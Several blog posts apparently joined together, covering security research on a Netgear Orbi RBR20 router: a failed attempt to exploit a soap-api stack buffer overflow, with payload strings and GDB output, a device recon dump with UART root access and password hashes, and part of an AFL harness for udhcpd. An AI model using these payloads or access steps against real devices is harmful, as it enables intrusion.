	printf("[+] sscanf call 1: parse method portion from resp\n");
	sscanf(resp, "<m:%sResponse%*s", method_buf);

	// this would check to confirm that the expected pattern/str was parsed (should still
	// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll
	// fail this check.
	var2 = strstr(method_buf, "Response");
	// but it doesn't really matter because it's only to see if
	if (var2 != (char *)0x0) {
		printf("[+] found 'Response' in method_buf, NULLED\n");
		*var2 = 0x0;
	}

	// ========= Second call to sscanf() and NULL check fail ===========
	// search for service string in resp, no NULL check
	// a long enough METHOD would result in this being truncated, causing strstr
	// to return a NULL pointer
	printf("[+] strstr call 1: check for 'service:' in resp\n");
	var3 = (char *)strstr(resp, "service:");
	// DEBUG -- show when we fail this check
	if (var3 == (char *)0x0) {
		printf("\033[0;31m[!] didn't find 'service:', expect a NULL ptr deref\n\033[0m");
		printf("resp: %s\n", resp);
	}
	printf("[+] sscanf call 2: parse ACTION portion from resp\n");
	sscanf(var3, "service:%[^:]", action_buf);

	// check for <ResponseCode> in resp
	printf("[+] strstr call 2: check for '<ResponseCode>' in resp\n");
	var3 = (char *)strstr(resp, "<ResponseCode>");
	if (var3 != (char *)0x0) {
		// if its there, parse some stuff from it (not important right now)
		printf("[+] found <ResponseCode>, passed check\n");
		undef1 = 0;
	}

	// check if the stack check int was overwritten
	printf("[+] stack check end: 0x%x\n", stack_check_val);
	return 0;
}

int main(int argc, char *argv[]) {
	// args to pass to target func (replicating original)
	FILE *streams = 0;

	// this will hold the payload (i.e. the Method portion we would submit)
	// read from env to make testing easier
	char *payload = getenv("PAYLOAD");
	printf("[+] payload length: %d\n", strlen(payload));

	// construct the response content the same way the server does in SendSoapRespCode()
	char resp_b[512];
	memset(resp_b, 0, 512);
  // this is the fmt string the calling function uses to construct resp
	char *resp_fmt = "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"></m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n";
	snprintf(resp_b, 512, resp_fmt, payload, "ConfigSync", payload, 404);

	// call the target function with the payload
	printf("[+] calling target function...\n\n");
	replica(streams, resp_b);
	return 0;
}

I experimented with various payloads using this code and this is when I made a new discovery: different payloads would cause resp to be corrupted in different ways, which would sometimes result in resp containing the ‘service:’ string before the first call to sscanf() but not after. The output below shows this happening with payload one would assume would definitely pass the string check:

-> % ./replica2
[+] payload length: 130
[+] calling target function...

resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response xmlns:m="urn:NETGEAR-ROUTER:service:ConfigSync:1"></m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAA
AAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response>
<ResponseCode>404</ResponseCode>

[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] found 'Response' in method_buf, NULLED
[+] strstr call 1: check for 'service:' in resp
[!] didnt find 'service:', expect a NULL ptr deref
resp: e:
[+] sscanf call 2: parse ACTION portion from resp
[1]    221258 segmentation fault (core dumped)  ./replica2

After some trial and error I eventually found a payload that would successfully overflow method_buf, avoid the null deref, and overwrite the simulated stack canary:

-> % ./replica2
[+] payload length: 2450
[+] calling target function...

resp: <m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:se

[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] strstr call 1: check for 'service:' in resp
[+] sscanf call 2: parse ACTION portion from resp
[+] strstr call 2: check for '<ResponseCode>' in resp
[+] stack check end: 0x63697672
[1]    221814 segmentation fault (core dumped)  ./replica2

Nice!

now, against the device

With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"

I modified the GDB script I had been using to break on __stack_chk_fail() instead of sscanf() to confirm and saw this in the output:

Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt goooooood.

I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"

Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0             0x0	0
r1             0xb6f01b65	3069188965
r2             **0x42424242**	1111638594
r3             0x5719b01e	1461301278
r4             0x0	0
r5             0xb6a39214	3064173076
r6             0xb6f2bb80	3069361024
r7             0xbe88e4cc	3196642508
r8             0xbe88e40c	3196642316
r9             0xbe88e3cc	3196642252
r10            0xbe88e3a4	3196642212
r11            0xb6f316fc	3069384444
r12            0xb6f2bc6c	3069361260
sp             0xbe88e388	0xbe88e388
lr             0xb6eb2aa8	-1226102104
pc             0xb69aee40	0xb69aee40 <__stack_chk_fail>
cpsr           0x80000010	-2147483632
0x0:	<error: Cannot access memory at address 0x0>
0xb6f01b65:	""
0x42424242:	<error: Cannot access memory at address **0x42424242**>
0x5719b01e:	<error: Cannot access memory at address 0x5719b01e>

stack canary bypass, question mark?

So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’ve only ever dealt with stack canaries in toy examples so this would be my first time trying against a real target and having to do it with the limited debugging environment only made things more difficult.

a primer on SSP

The Stack Smashing Protector (SSP) is a compiler feature specifically design to detect stack-based buffer overflows and abort the program if one is detected to mitigate the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: the compiler inserts code that copies a value from a global variable into a local variable (the canary) at the start of a function and code to check that this value still matches the value saved in the global variable at the end of the function, before it returns. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame — this means a buffer overflow that has successfully corrupted the return address would have also corrupted the canary value, which would result in the canary check failing and the program being aborted before the function returns and attempts to use the corrupted return address.

For GCC’s -fstack-protector, for example:

This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.

It’s important to note one thing: this protection does not prevent overflows from happening — it’s only meant to detect them and try to mitigate against classic stack overflow exploitation. This means that any code that executes after the overflow has occurred but before the end of the function when the canary is check could be affected by the effects of the memory corruption. Modern implementations do a few things to mitigate against this as well, such as reordering of variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted and placing all buffers together in memory right before the canary and return address to limit the scope of data that can be corrupted and increasing the likelyhood of overflows overwriting the canary value.

Another important point is that the canary value is set at runtime, so it remains the same for the entire lifetime of the application, as well as if the application forks. New processes started via the shell or execve() will have unique canaries.

I took a look at arch/arm/include/asm/stackprotector.h in the kernel sources for the kernel used by the device (custom fork of 3.14.77) and found this code, showing that for canary is initialized by XORing random bytes against the value of LINUX_VERSION_CODE on ARM architectures:

static __always_inline void boot_init_stack_canary(void)
{
	unsigned long canary;

	/* Try to get a semi random initial value. */
	get_random_bytes(&canary, sizeof(canary));
	canary ^= LINUX_VERSION_CODE;

	current->stack_canary = canary;
	__stack_chk_guard = current->stack_canary;
}

bruteforcing? I guess…not

Generally speaking, there are two ways of going about bypassing the canary check:

• Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten
• Bruteforce the canary byte-by-byte (only works under certain conditions)

Since I hadn’t found any ways to leak memory, the only real option I would have is bruteforcing. There’s a specific bruteforcing technique that can greatly reduce the total number of attempts needed to determine the canary value by guessing one byte at a time, using the lack of a crash as an oracle to determine when the correct byte has been guessed and repeating this for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g.read / recv). I found a few good resources that helped me better understand this concept such as this LiveOverflow video and this CTF guide (screenshot below taken from here)

Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.

The output belows shows the debugger breaking at the start of __stack_chk_fail() with r2 containing the local copy of the stack canary that has been overwritten by a single byte and r3 containing the original. As you can see, the byte that was written was 00 (NULL) — the function that reads the payload into the buffer (sscanf()) appends a NULL. So, the first condition for this to be viable is out.

Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
 pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
 Outermost frame: Cannot access memory at address 0x4f532f34
 Arglist at 0xbecd34c8, args:
 Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0             0x0      0
r1             0xb6edeb65       3069045605
**r2             0xb710d200       3071332864**
r3             0xb710d29e       3071333022
r4             0x0      0
r5             0xb6a16214       3064029716
r6             0xb6f08b80       3069217664
r7             0xbecd360c       3201119756
r8             0xbecd354c       3201119564
r9             0xbecd350c       3201119500
r10            0xbecd34e4       3201119460
r11            0xb6f0e6fc       3069241084
r12            0xb6f08c6c       3069217900
sp             0xbecd34c8       0xbecd34c8
lr             0xb6e8faa8       -1226245464
pc             0xb698be40       0xb698be40 <__stack_chk_fail>
cpsr           0x80000010       -2147483632

Not only that, the canary value was changing in between each request. In retrospect, this is obvious since soap-api is not forking itself to handle the requests, but instead being execve‘ed at some point after lighttpd forks.

So, yeah — (smarter) bruteforcing was out of the question. Since along the way I’d also learned PIE and RELRO was enabled on the binary, I called it quits at this point and feel pretty confident in saying this isn’t an exploitable issue.

conclusion

This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.

Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.

references

• Stack Canaries – Gingerly Sidestepping the Cage [2021]
• LiveOverflow video
• CTF guide on stack canaries
• Bruteforcing x86 Stack Canaries

Introduction

I wanted to upgrade the WiFi at home a few years ago and ended up purchasing one of Netgear’s Orbi line of mesh WiFi routers. After about a year I ended doing a ‘real’ upgrade to some Ubiquiti equipment, so I had this Orbi just laying around and decided to use it as a target for bug hunting. I’ve done a bit of research against IoT devices in the past and wanted something new to look into. I’ve now been hunting on this device for about a year and half, walking away and coming back to it multiple times, and sometimes going months without doing anything with it. Over this time I’ve explored a few angles and documented quite a bit of it so I thought I’d just start dumping some of this information here, mostly in the hopes that it may be useful to anyone else in the future who may be interested in doing their own hunting on this device.

Minor disclaimer: This series of posts may be a bit disjointed and may not always provide much of a narrative. As mentioned above, it’s meant to be a data dump and not so much a walkthrough of every step I took along the way. Where possible I’ll provide context around how I came to certain conclusions, why I decided to look in a particular area, and any other information that I think may be useful to others.

Overview

System Details

• Device: Netgear Orbi (RBR20)
• Firmware Version(s):
  • 2.5.1.16 (Download)
  • 2.7.33 (Download)
• Architecture: ARMv7 rev 5
• Kernel: Linux RBR20 3.14.77 #2 SMP PREEMPT
• OS: Customized OpenWRT Chaos Calmer image

Hardware Details

Basic Specs

• Processor: Quad-Core ARM Cortex-A7, Qualcomm
• Memory: 1GB RAM
• Storage: 512MB NAND flash
• Radio: 2.4Ghz + 5Ghz wireless

Board Layout and Components

I took a look at the FCC listing for this particular device and reviewing the internal photographs but soon discovered that the images on this site didn’t exactly match my device and certain components were either different brands/devices or missing entirely from the images compared to my actual device. In any case, this still provided a good point of reference that would help with getting a general understanding of where things were supposed to be.

The top of the PCB exposes the following components:

• BLE + Wifi SoC
• CPU (beneath a shield)
• Voltage regulator
• RJ45 ports
• Power input
• UART pins

The bottom side of the PCB:

• Winbond NAND flash
• NANYA DRAM

Firmware Extraction

I used binwalk to extract the root filesystem from the firmware images provided by Netgear. This successfully extracted the embedded squashfs filesystem.

Below is a listing of the root directory from the extracted filesystem:

drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 __rd_debug_only
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 bin
-rw-r--r--  1 builder builder     9 Feb 13 00:47 cloud_version
drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 data
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 dev
drwxr-xr-x 33 builder builder  4096 Feb 13 02:20 etc
-rw-r--r--  1 builder builder    11 Feb 13 00:47 firmware_language_version
-rw-r--r--  1 builder builder     1 Feb 13 00:47 firmware_region
-rw-r--r--  1 builder builder    29 Feb 13 00:47 firmware_time
-rw-r--r--  1 builder builder    10 Feb 13 00:47 firmware_version
-rw-r--r--  1 builder builder    11 Feb 13 00:47 flash_type
-rw-r--r--  1 builder builder    11 Feb 13 00:47 hardware_version
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 home -> /tmp
-rw-r--r--  1 builder builder    31 Feb 13 00:47 hw_id
drwxr-xr-x 18 builder builder  4096 Feb 13 02:20 lib
lrwxrwxrwx  1 builder builder     8 Feb 13 00:47 mnt -> /tmp/mnt
-rw-r--r--  1 builder builder     6 Feb 13 00:47 module_name
drwxr-xr-x  5 builder builder  4096 Feb 13 02:20 opt
lrwxrwxrwx  1 builder builder    12 Feb 13 00:47 overlay -> /tmp/overlay
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 proc
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 rom
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 root
drwxr-xr-x  3 builder builder 12288 Feb 13 02:20 sbin
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 sys
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 tmp
drwxr-xr-x  9 builder builder  4096 Feb 13 02:20 usr
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 var -> /tmp
drwxr-xr-x 14 builder builder 57344 Feb 13 02:20 www

GPL Code

Apart from the files from extracted firmware images, I also downloaded the GPL code for each of the firmware versions I looked at. Download links for these packages can be found on this page for Netgear, though most vendors provide these packages as required by the license. They include source code all GPL code they use and/or modified to create the system.

• GPL Code for v2.5.1.16
• GPL Code for v2.7.33

The majority of the custom code/interesting files are located under the git_home directory of the extracted archive (which is an OpenWrt buildroot directory).

Note: While having vendors provide their modified code sounds great in theory, the reality is a little different. For example, the GPL packages for the Orbi include a lot of source code, but specific open source applications they made modified copies of are given in binary form only.

Firmware 2.5.1.16 vs. 2.7.33 Changes

There are a couple of important things that changed between these two firmware versions that I want to mention here.

(Easy) Telnet Access Removed

First, in the older version it was possible to enable Telnet access via the hidden debug page at http://<orbi>/debug_detail.htm when logged in as the admin user. This was removed in the later version and it is no longer trivial to enable Telnet. There does appear to still be Netgear’s custom Telnet server telnetenable that listens on UDP port 23 and will only “activate” upon receiving a ‘magic’ packet containing username/pass and other info in a specific format (see here).

The code for this binary is included in the GPL packages. Version 2.5.x seems to have only allowed the use of this feature if the Region was set to Chinese and the Region file contained “WW” (shown below). The 2.7.x version doesn’t include this check and simply compares the received data against a local version it constructs (the main server loop is shown below):

	for (;;) {
		FD_ZERO(&readable);
		FD_SET(fd, &readable);

		if (select(fd + 1, &readable, NULL, NULL, NULL) < 1)
			continue;

		slen = sizeof(struct sockaddr_in);
		r = recvfrom(fd, rbuf, sizeof(rbuf), 0, (struct sockaddr *)&from, &slen);
		if (r < 1)
			continue;

		datasize = fill_payload(output_buf);
		if (r == datasize && memcmp(rbuf, output_buf, r) == 0) {
			/* maybe it's better to judge whether utelnetd is running in real time here */
			if (telnet_enabled == 0) {
				printf("The telnet server is enabled now!!!\n");
				system(TELNET_CMD);
				telnet_enabled = 1;
			}
			sendto(fd, ack, 3, 0, (struct sockaddr *)&from, slen);
		}
	}

Even so, I’ve yet to successfully enable Telnet even when using known-good credentials with either the telnet version linked above or my own customized version of the code included in the GPL packages.

Binaries in GPL Packages Stripped

The earlier version of GPL code package provided binaries that had not been stripped of debug symbols, making reverse engineering of these specific applications much easier. They’re still useful for reversing newer binaries though as most functions are still intact and knowing exactly what everything should be called always helps.

The paths to some of these binaries are provide here (these are paths on the root filesystem of the device):

/usr/sbin/net-cgi
/usr/sbin/soap-api
/usr/sbin/miniupnpd

UART Serial Console Access

After losing Telnet access when my device was inintentionally upgraded, I moved on to seeing if I could get access to a console over serial. My device still had pins connected as shown below so this immediately caught my attention as being a potential serial interface. I found info online for other Orbi models that showed the correct pin layout.

Starting with the pin closes to the RJ45 port:

• GND, RX, TX, power (not needed)

I connected to these pins on the board using an FTDI serial-USB converter in the 3.3v configuration at 115200 baud (8N1) and successfully dropped into a root shell.

Bonus: GreatFET ONE UART Setup

After confirming this worked with the FTDI converter, I decided to use my GreatFET ONE board moving forward. This is an interesting hardware hacking tool I bought some time ago to begin experimenting with USB fuzzing/analysis. It allows for USB proxying and emulation of various USB devices (keyboard, storage, etc) through a programmatic interface using Python.

I remembered that it can also be used for serial/UART connections but had a difficult time finding any good documentation or examples of doing this. Eventually, I was able to get this working by connecting pins to the following ports on the GreatFET’s J1 bank of I/O pins (see full pin table here):

• 1:GND
• 33:RX
• 34:TX

I then used the built-in UART script provided by the greatfet library/CLI tool:

greatfet uart --wait -P none -N

Recon Dump

boot log highlights

CPU Info:

Booting Linux on physical CPU 0x0
Linux version 3.14.77 (lijun.xue@cnshadnicp03.deltaos.corp) (gcc version 5.2.0 (OpenWrt GCC 5.2.0 r6043) ) #1 SMP PREEMPT Fri Jun 4 19:11:51 CST 2021
CPU: ARMv7 Processor [410fc075] revision 5 (ARMv7), cr=10c5387d
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine model: Qualcomm Technologies, Inc. IPQ40xx/AP-DK04.1-C1
PERCPU: Embedded 8 pages/cpu @dfbc7000 s8448 r8192 d16128 u32768
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 125952

Kernel memory layout:

Virtual kernel memory layout:
    vector  : 0xffff0000 - 0xffff1000   (   4 kB)
    fixmap  : 0xfff00000 - 0xfffe0000   ( 896 kB)
    vmalloc : 0xe0800000 - 0xff000000   ( 488 MB)
    lowmem  : 0xc0000000 - 0xe0000000   ( 512 MB)
    pkmap   : 0xbfe00000 - 0xc0000000   (   2 MB)
    modules : 0xbf000000 - 0xbfe00000   (  14 MB)
      .text : 0xc0208000 - 0xc073e1fc   (5337 kB)
      .init : 0xc073f000 - 0xc076a100   ( 173 kB)
      .data : 0xc076c000 - 0xc07abb38   ( 255 kB)
       .bss : 0xc07abb38 - 0xc0804680   ( 355 kB)
SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
Preemptible hierarchical RCU implementation.

System Users

root@RBR206:/# cat /etc/passwd
root:$5$BChRWDkyPlaOVrGS$/kQaqSCIWiiM36IuwS5phJHhpzdnP9osEVONs4CZa3C:0:0:root:/tmp:/bin/ash
guest:*:65534:65534:guest:/tmp/ftpadmin:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
admin:x:1:1:Linux User,,,:/tmp/ftpadmin:/bin/ash

root@RBR206:/# cat /etc/shadow 
guest::10957:0:99999:7:::
admin:$1$QPu5pxAi$ITZQ21EZg7P2B48TsiQwg1:18612:0:99999:7:::

Listening Processes (netstat -lp)

root@RBR20:/# netstat -lp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.13.13.1:7272         0.0.0.0:*               LISTEN      15890/circled
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      8278/lighttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      16137/dnsmasq
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      8278/lighttpd
tcp        0      0 :::www                  :::*                    LISTEN      8278/lighttpd
tcp        0      0 :::56688                :::*                    LISTEN      7298/miniupnpd
tcp        0      0 :::domain               :::*                    LISTEN      16137/dnsmasq
tcp        0      0 :::https                :::*                    LISTEN      8278/lighttpd
udp        0      0 10.13.13.1:38407        0.0.0.0:*                           7298/miniupnpd
udp        0      0 10.13.13.1:23           0.0.0.0:*                           12782/telnetenable
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           16137/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           2646/udhcpd
udp        0      0 0.0.0.0:tftp            0.0.0.0:*                           8334/tftpd-hpa
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           7298/miniupnpd
udp        0      0 0.0.0.0:45226           0.0.0.0:*                           5777/net-scan
udp        0      0 10.13.13.1:5351         0.0.0.0:*                           7298/miniupnpd
udp        0      0 :::domain               :::*                                16137/dnsmasq

Mount Points

root@RBR20:~# mount
rootfs on / type rootfs (rw)
/dev/root on /rom type squashfs (ro,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,noatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,noatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noatime)
overlayfs:/tmp/overlay on / type overlayfs (rw,relatime,lowerdir=/,upperdir=/tmp/overlay)
tmpfs on /dev type tmpfs (rw,nosuid,relatime,size=512k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600)
debugfs on /sys/kernel/debug type debugfs (rw,noatime)
ubi0:vol_ntgr on /tmp/mnt/ntgr type ubifs (rw,relatime)
ubi0:vol_arlo on /tmp/dal type ubifs (rw,relatime)
ubi0:vol_devtable on /tmp/device_tables type ubifs (rw,relatime)
ubi0:vol_circle on /tmp/mnt/circle type ubifs (rw,relatime)

Web Servers

Web servers will be discussed in further detail in a future post but for now I’ll just cover some of the basics.

The following binaries provide an HTTP server or otherwise involved in handling HTTP-formatted requests.

/usr/sbin/lighttpd
/usr/sbin/net-cgi
/usr/sbin/soap-api
/www/cgi-bin/proccgi

• lighttpd is the main user-facing web server process the handles requests, mostly wraps around net-cgi
• net-cgi handles the bulk of admin functionality that reads underlying system configs and makes config changes
  • net-cgi responses are typically embedded within responses returned by lighttpd within iframes or as raw data written back to the FD.
• soap-api is the binary called by the CGI handler to handle SOAP requests. All requests to /soapapi.cgi or /soap/server_sa are routed to this binary. It is a CGI application that reads most of the request data from environment variables (it expects that parent process to set all of this up prior to spawning soap-api).

Only the following pages are accessible prior to authentication:

/unauth.cgi
/passwd_reset.cgi
/basic_home_result.txt
/debuginfo.htm

Wrapping Up

Okay, that was a ton of info.

As mentioned above, future posts will dive deeper into specific areas of interest and include some of my findings in these areas.

References

• netgear-telnetenable Python script
• Orbi RBR20 FCCID.io page
• Netgear GPL Downloads page
• GreatFET One

Introduction

I’ve been looking at a router on and off for a little over a year now and recently began looking at fuzzing some of the code for exposed services, one of them being DHCP. As DHCP is reachable pre-auth, I was interested in seeing whether there may be any bugs that could be triggered via DHCP messages. Specifically, I wanted to use AFL to fuzz the functions that parsed/handled DHCP client messages. For the first run, I focused on DHCPDISCOVER messages.

This post will go over an idea I had for how to create a custom fuzzing harness and the steps I took to get everything working. This includes:

• Create a fuzzing harness from the udhcpd server code using AFL’s LLVM persistent mode fuzzing feature
• Generate a fuzzing corpus using the udhcpc client code to produce dhcpMessage data and write it to files

Disclaimer: this post contains 0 0days. Sorry!

A Hacky(?) Approach

Before I could get started I needed to figure out how to create a harness that I could use to fuzz the target functions with AFL, which isn’t designed to do network-based fuzzing. There are forks of AFL that do support network fuzzing, but I hadn’t looked into them much and I had an idea for how I might be able to do it that would allow me to remove the socket binding entirely.

The idea was basically this:

• Create a modified version of the udhcp client code (udhcpc) to generate valid DHCP message packets and write the raw bytes of the data structures to files
• Create a modified version of the udhcp server code (udhcpd) that reads packet data from the output files instead of from the network and then enter a fuzzing loop where that seed data is continuously mutated and resubmitted for fuzzing

I chose to use AFL’s persistent mode feature since it would allow me to target only the code used to handle DHCPDISCOVER messages and would improve overall performance. This also fit perfectly for my idea since persistent mode does almost exactly what I wanted (enter a fuzzing loop to target specific functions). You can learn more about persistent mode here.

Dev Setup

Below are the details for the working environment and tools I used throughout the development of the project:

• OS: Ubuntu Server 20.04 VM
• Specs: 8 cores, 16Gb RAM (you definitely don’t need this to just build the code but it helps for the actual fuzzing part!)
• Tools: Docker, vim, AFL++

For simplicity’s sake, I chose to use the AFL++ docker container rather than go through the setup needed to install the necessary LLVM/Clang versions required for AFL’s persistent mode. This offers a fully functional working environment where you can easily mount your target source code and compile with the desired instrumentation.

docker run -ti -v $PWD:/src aflplusplus/aflplusplus

About udhcp

This application is now built directly into Busybox, but used to be distributed as a standalone application that provides both server and client functionality. The router in question is running a modified version of udhcpd version 0.9.8. I was able to get the source code for the modified version but couldn’t get it to build so I just went with the vanilla source downloaded from here.

Code Review

I began by reviewing the code in dhcpd.c to identify where handling of DHCPDISCOVER messages was being done and to get a feel for how the code worked. dhcpd.c is a relatively small file (less than 300 LOC) and the main function contains entry points for handling every type of DHCP client message.

The code begins by declaring and initializing some variables and then loading the server configuration from a config file:

memset(&server_config, 0, sizeof(struct server_config_t));
	
	if (argc < 2)
		read_config(DHCPD_CONF_FILE);
	else read_config(argv[1]);

After this the code does some more initialization of vars and server config values from the parsed config file and then enters the main server loop that handles receiving packets for processing. The capture of packets is done by get_packet() in the following code, which parses the packet into a dhcpMessage struct called packet:

if ((bytes = get_packet(&packet, server_socket)) < 0) { /* this waits for a packet - idle */
			if (bytes == -1 && errno != EINTR) {
				DEBUG(LOG_INFO, "error on read, %s, reopening socket", strerror(errno));
				close(server_socket);
				server_socket = -1;
			}
			continue;
		}

Immediately after this, the code parses the DHCP message type from packet and saves it to state:

if ((state = get_option(&packet, DHCP_MESSAGE_TYPE)) == NULL) {
			DEBUG(LOG_ERR, "couldn't get option from packet, ignoring");
			continue;
		}

The value saved to state is then used in a switch statement with cases for handling each type of DHCP message. This is where the handling for DHCPDISCOVER is defined, which calls a single function, sendOffer(), passing in packet as an argument:

switch (state[0]) {
		case DHCPDISCOVER:
			DEBUG(LOG_INFO,"received DISCOVER");
			
			if (sendOffer(&packet) < 0) {
				LOG(LOG_ERR, "send OFFER failed");
			}
			break;
		<--- snip --->
}

With all of this in mind, I made the following determinations:

• The testcase data would need to be read/parsed into a dhcpMessage struct so that it can be passed to the target function
• The target function would be sendOffer()
• The best place to insert the fuzzing loop would be right before entering the switch block that checks the DHCP message type

Creating the Harness

To get started, I created a copy of the original dhcpd.c file that I would use to create the harness.

Server Configuration and Initialization

Most of the original code that handles the reading of the config file, initialization of the server_config global structure, memory allocation for leases, and reading of the network interface for more server_config initialization was left as-is except for some minor changes (shown here):

  // read config file into server_config global
	memset(&server_config, 0, sizeof(struct server_config_t));
	read_config("./test-udhcpd.conf"); // edit: hardcode the config file name

	pid_fd = pidfile_acquire(server_config.pidfile);
	pidfile_write_release(pid_fd);
  server_config.lease = LEASE_TIME; // edit: always use default lease time
	
	// allocate mem for leases and read from lease file
	leases = malloc(sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
	memset(leases, 0, sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
	read_leases(server_config.lease_file);

	if (read_interface(server_config.interface, &server_config.ifindex,
			   &server_config.server, server_config.arp) < 0)
		return 1;

As shown above, the harness is hardcoded to search for a config file named test-udhcpd.conf in the local working directory. Below is a minimal configuration file used for the harness (the start/end values and the interface must match the actual network configuration of the host where the harness will run):

start 		172.0.2.10	  #default: 192.168.0.20
end		    172.0.2.20	  #default: 192.168.0.254
interface	eth0		      #default: eth0
opt	dns	  192.168.10.2 192.168.10.10
option subnet	255.255.255.0
opt	router	172.0.2.1
option	  domain	local
option	  lease	864000		# 10 days of seconds

Inserting the Persistent Mode Fuzzing Loop

I then replaced the infinite server loop (while (1)) with the main AFL fuzzing loop (_while (__AFL_LOOP())). Since testcase data was going to be passed in via input files, there was no need to have the server bind to a socket and actually listen for packets, so I removed the majority of the server networking code from the start of the main loop.

I replaced this code with the code needed to reset state, read the testcase data into a dhcpMessage structure, and call the target function. Specifically, this code does the following:

• Zeroing out the leases buffer and reinitializing it by calling read_leases() to ensure each loop starts with the same state
• After a sanity check of the testcase buffer size, the dhcpMessage struct that will hold the testcase data is zeroed out and the data is copied to the fuzz_packet struct using memcpy.
